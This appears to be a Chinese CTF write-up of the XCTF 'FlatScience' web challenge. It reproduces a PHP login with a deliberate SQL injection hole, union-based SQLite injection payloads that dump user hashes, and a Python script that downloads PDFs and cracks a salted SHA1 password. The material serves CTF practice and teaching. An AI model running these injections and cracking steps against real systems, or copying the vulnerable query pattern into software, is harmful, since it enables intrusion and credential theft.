攻防世界web进阶区FlatScience详解

最新推荐文章于 2023-12-29 18:21:24 发布
最新推荐文章于 2023-12-29 18:21:24 发布
阅读量2.7k 收藏 10
点赞数 5
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/107846000
版权

攻防世界web进阶区FlatScience

题目

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

解法

我们一个一个点进去发现也就是一些论文之类的
在这里插入图片描述
我们御剑发现了一些东西
robots。txt
我们登录试试
在这里插入图片描述
在login页面有报错,我们猜测是sql注入
在这里插入图片描述
他的源码中写到,登录是你不可能绕过的在这里插入图片描述
这里源码中出现了?debug,可能是一个调试页面,我们访问看看
在这里插入图片描述

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->

判定POST提交的usr和pw是否存在,很显然usr处存在注入
这里提醒是sqlite数据库

tips:

sqlite数据库有一张sqlite_master表,
里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息

我们使用sqlmap进行尝试
在这里插入图片描述
可见,存在注入
但是并没有跑出来,可能是我的网速问题
这里我们知道了他的数据库是sqlite
那么我们进行手工注入
1’ --+,不报错,说明闭合方式确定了。

1' order by 3 --+报错,1' order by 2 --+不报错,说明字段是2,

在这里插入图片描述
这里我们看到有回显了
在这里插入图片描述

CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)

我们查询到了他的数据库,发现有hint这个选项
进去看看看
在这里插入图片描述
在这里插入图片描述
这里查到,需要他的论文,
我们查询一下其他的列

1' union select id,group_concat(id) from users--+得到1,2,3

1' union select id,group_concat(name) from users--+得到admin,fritze,hansi

1' union select id,group_concat(password) from users--+得到3fab54a50e770d830c0416df817567662a9dc85c、54eae8935c90f467427f05e4ece82cf569f89507、34b0bb7c304949f9ff2fc101eef0f048be10d3bd

在这里插入图片描述

我们猜测,他的密码应该和pdf有关
使用网上的脚本
python3爬取多目标网页PDF文件并下载到指定目录:

import requests
import re
import os
import sys

re1 = '[a-fA-F0-9]{32,32}.pdf'
re2 = '[0-9\/]{2,2}index.html'

pdf_list = []
def get_pdf(url):
    global pdf_list 
    print(url)
    req = requests.get(url).text
    re_1 = re.findall(re1,req)
    for i in re_1:
        pdf_url = url+i
        pdf_list.append(pdf_url)
    re_2 = re.findall(re2,req)
    for j in re_2:
        new_url = url+j[0:2]
        get_pdf(new_url)
    return pdf_list
    # return re_2

pdf_list = get_pdf('http://220.249.52.133:46876/')
print(pdf_list)
for i in pdf_list:
    os.system('wget '+i)

from io import StringIO

#python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter


import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request


def get_pdf():
    return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_to_txt(path_to_file):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    codec = 'utf-8'
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
    fp = open(path_to_file, 'rb')
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    password = ""
    maxpages = 0
    caching = True
    pagenos=set()

    for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):
        interpreter.process_page(page)

    text = retstr.getvalue()

    fp.close()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print ("Searching word in " + i)
        pdf_text = convert_pdf_to_txt("./"+i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest()
            if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
                print ("Find the password :" + word)
                exit()
            
 
if __name__ == "__main__":
    find_password()

得到admin的密码为ThinJerboa
在这里插入图片描述

無名之涟
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界—-(web进阶FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界-Web高手进阶-FlatScience
feng的博客
09-13 567
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1310
题目 ---- FlatScience 一、writeup 二、知识点
攻防世界WEB进阶FlatScience
harry_c的博客
09-30 5449
攻防世界WEB进阶FlatScience一、分析二、实操三、答案 FlatScience 难度系数: 1星 题目来源: Hack.lu-2017 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 点击打开场景,发现都是文件下载的内容,是几篇英文文献 上一题有用到的robots.txt,构造一下http://IP:端口/robots.txt 果然有重要内容: 二、实操 分别进入像个网站...
攻防世界-web-FlatScience
wuh2333的博客
10-25 395
攻防世界webFlatScience
[CTF题目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1711
[CTF题目总结-web篇]攻防世界flatscience
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
暗战亮剑-黑客攻防入门与进阶全程实录
04-19
暗战亮剑-黑客攻防入门与进阶全程实录暗战亮剑-黑客攻防入门与进阶全程实录
攻防世界-FlatScience
m0_47571887的博客
11-20 917
打开题目,左右看了看,就是一些文章,试了下robots.txt,看到两个php 挨个访问,发现admin.php和login.ogo都是一个登陆页面,不过admin.php有一个默认的admin账号,猜测应该是获取到密码拿到flag,我们看看login.php里面有什么 在login.php页面里,我习惯性的先看一下源码,发现了一个?debug 提交过后,返回了一段源码, 这里我们看到数据库是SQLite3,不是MySQL,在sqlite数据库有一张sqlite_master表,..
【网络安全 | CTF】FlatScience
最新发布
等风来
12-29 2899
pass变量拼接Salz并且经过sha1加密后与password进行比较所以思路是SQL注入把pass找出来,注意这里的数据库是SQLite数据库先判断注入点个数:
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 279
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界-web萌新-FlatScience(python处理pdf、sqlite注入)-Hack.lu-2017
Sea_Sand息禅
04-15 5796
日常扫描: 进站后点击链接尝试会让下载pdf文件。(后面要用到pdf文件) 访问robots.txt: 再依次对这两个页面进行测试: admin.php无论如何输入都没有什么反馈 login.php在username中输入admin' union select database()时报错: 可以看到是sqlite数据库,表的结构和查询函数和MySQL有所不同。 在这里花了相当长的时间...
攻防世界 FlatScience
CyhDl666的博客
02-25 295
各种here these 一个个点 url不断变化 直接dirsearch扫描一些 - 最近做题经常做到robots.txt!!!1 访问了一下 也是给了admin.php 和 login.php 访问login界面是个登录窗 访问admin界面也是登录窗 不过账号已经给你了 看到登录界面难面尝试一下sql注入 这里我想到以前做个的一个sql注入加md5加密的题目 但是这个得需要知道查询的代码 没学过sqlite3 无奈wp CppSQLite3Queryquery = db.execQue.
XCTF攻防世界web新手练习_ 5_simple_js
silence1_的博客
04-28 9006
XCTF攻防世界web新手练习—disabled_button 题目 题目为simple_js,提示信息: 打开题目,弹出一个弹窗,提示输入密码 随便输入一个,提示输入错误,之后查看源码,得到js源代码,是一个解码函数 分析源码,发现随便输入什么都会输出 pass="70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"对应的字符 用pyt...
攻防世界-- web高手进阶-- writeup汇总
yisosooo的博客
09-22 6303
随做随记,争取记录详细思路,以供后续反思。 第一题-- cat 按照提示输入loli.club,没有任何回显。输入baidu.com也没有任何回显。再次尝试输入127.0.0.1,出现: 可知,submit其实是ping命令,而且好像只对ip地址起作用。尝试运行系统命令: 失败。输入127.0.0.1 | ls 同样失败。但是发现URL编码可以传入。当输入到%80时,出现报错信息,...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值